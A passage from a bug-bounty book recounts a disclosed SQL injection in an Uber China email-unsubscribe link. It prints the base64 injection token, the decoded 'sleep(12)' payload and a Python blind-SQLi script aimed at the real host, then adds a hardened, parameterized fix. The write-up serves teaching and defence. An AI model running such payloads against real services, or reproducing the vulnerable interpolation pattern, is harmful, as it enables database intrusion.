
  • Bug Bounty Hunting Essentials
  • Carlos A. Lozano Shahmeer Amir
  • 351 words
  • 2021-06-10 18:35:34

Uber SQL injection

  • Title: SQL injection on sctrack.email.uber.com.cn.
  • Reported by: Orange.
  • Bounty Rewarded: $4,000.
  • Web application URL: http://sctrack.email.uber.com.cn.
  • Description: Uber is a famous ride-hailing service; it is one of the biggest in the world and is used in a number of cities around the world by people who want to move from one place to another. The reporter in this case, Orange Tsai, a famous bug bounty hunter, traveled to China and called an Uber. Uber sends marketing emails to riders based on their location; now, like any rider, the first thing to do is to unsubscribe from that email. That is what Orange did, but bug bounty hunters have keen eyes; Orange observed that the unsubscribe link he received in China was different from the one he received in normal circumstances. In the original report, the URL looked something like this: http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=eyJ1c2VyX2lkIjogIjU3NTUgYW5kIHNsZWVwKDEyKT0xIiwgInJlY2VpdmVyIjogIm9yYW5nZUBteW1haWwifQ==.

The p parameter carries an encoded string that is sent to the backend server once the link is visited. The value of p is base64-encoded JSON, into which a time-based SQL expression has been inserted. Decoded, p contains two fields: user_id, the user identifier, and receiver, the receiving email address. Orange identified that he could embed a time-based SQL expression in the user_id field, which looks something like this:

{"user_id": "5755 and sleep(12)=1", "receiver": "orange@mymail"} 

So, if the injected sleep(12) is executed by the database, the response is delayed by 12 seconds, which confirms the injection. This is what we call the hello world of proofs of concept. From there on, Orange created a script with which he could enumerate the database name and current user. A snippet from the script is as follows:

import json 
import string 
from base64 import b64encode 
from urllib.parse import quote 
 
import requests 
 
base = string.digits + '_-@.' 
payload = {"user_id": 5755, "receiver": "blog.orange.tw"} 
 
for l in range(0, 30): 
    for i in 'i' + base: 
        # blind condition on one character of user(); '#' comments out the rest of the query 
        payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#" % (l + 1, i) 
        new_payload = b64encode(json.dumps(payload).encode()).decode() 
        r = requests.get('http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=' + quote(new_payload)) 
        # the excerpt stops here; the full script evaluates each response to keep or discard the guess 

The script crafts one payload per character position and candidate character, sends each in an HTTP request to the target server, and from the responses recovers the current user and the database name, as follows:

sendcloud_w@10.9.79.210 
sendcloud 
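The root cause described above is that the decoded user_id is treated as SQL rather than as data. The following is an added example, not code from the book or from Uber: a hypothetical vulnerable handler beside a hardened one that strictly validates the decoded p parameter and binds the values as query parameters. The table name, helper names and the benign sample token are constructed for the example; the REPORTED_TOKEN value is the one quoted in the report.

```python
import base64
import json
import re
import sqlite3

# Token quoted in the report; it decodes to {"user_id": "5755 and sleep(12)=1", ...}.
REPORTED_TOKEN = ("eyJ1c2VyX2lkIjogIjU3NTUgYW5kIHNsZWVwKDEyKT0xIiwgInJlY2VpdmVy"
                  "IjogIm9yYW5nZUBteW1haWwifQ==")
EMAIL_RE = re.compile(r"^[^@\s]{1,64}@[^@\s]{1,255}$")

def make_token(user_id, receiver):
    """Build a token in the same base64(JSON) shape (constructed helper, not Uber's code)."""
    return base64.b64encode(json.dumps({"user_id": user_id, "receiver": receiver}).encode()).decode()

def unsafe_unsubscribe_sql(token):
    """Hypothetical vulnerable handler: decoded fields are interpolated straight into SQL."""
    data = json.loads(base64.b64decode(token))
    return ("UPDATE subscribers SET unsubscribed=1 WHERE user_id=%s AND receiver='%s'"
            % (data["user_id"], data["receiver"]))

def parse_token(token):
    """Decode and strictly validate p; returns (user_id, receiver) or raises ValueError."""
    try:
        data = json.loads(base64.b64decode(token, validate=True))
    except ValueError as exc:  # binascii.Error and JSONDecodeError are both ValueErrors
        raise ValueError("token is not base64-encoded JSON: %s" % exc)
    if not isinstance(data, dict) or set(data) != {"user_id", "receiver"}:
        raise ValueError("unexpected token structure")
    uid, receiver = data["user_id"], data["receiver"]
    # The reported payload carries user_id as a string; insisting on an int stops it here.
    if isinstance(uid, bool) or not isinstance(uid, int) or uid < 0:
        raise ValueError("user_id must be a non-negative integer")
    if not isinstance(receiver, str) or not EMAIL_RE.match(receiver):
        raise ValueError("receiver is not a plausible email address")
    return uid, receiver

def token_is_valid(token):
    try:
        parse_token(token)
        return True
    except ValueError:
        return False

def safe_unsubscribe(conn, token):
    """Hardened handler: validated values are bound as parameters, never spliced into SQL."""
    uid, receiver = parse_token(token)
    cur = conn.execute("UPDATE subscribers SET unsubscribed=1 WHERE user_id=? AND receiver=?",
                       (uid, receiver))
    return cur.rowcount

def demo_roundtrip():
    conn = sqlite3.connect(":memory:")  # in-memory table constructed for the demo
    conn.execute("CREATE TABLE subscribers (user_id INTEGER, receiver TEXT, unsubscribed INTEGER)")
    conn.execute("INSERT INTO subscribers VALUES (5755, 'rider@example.com', 0)")
    return safe_unsubscribe(conn, make_token(5755, "rider@example.com"))
```

Run demo_roundtrip() to see one row unsubscribed by a benign token, while parse_token(REPORTED_TOKEN) is rejected before any SQL is built.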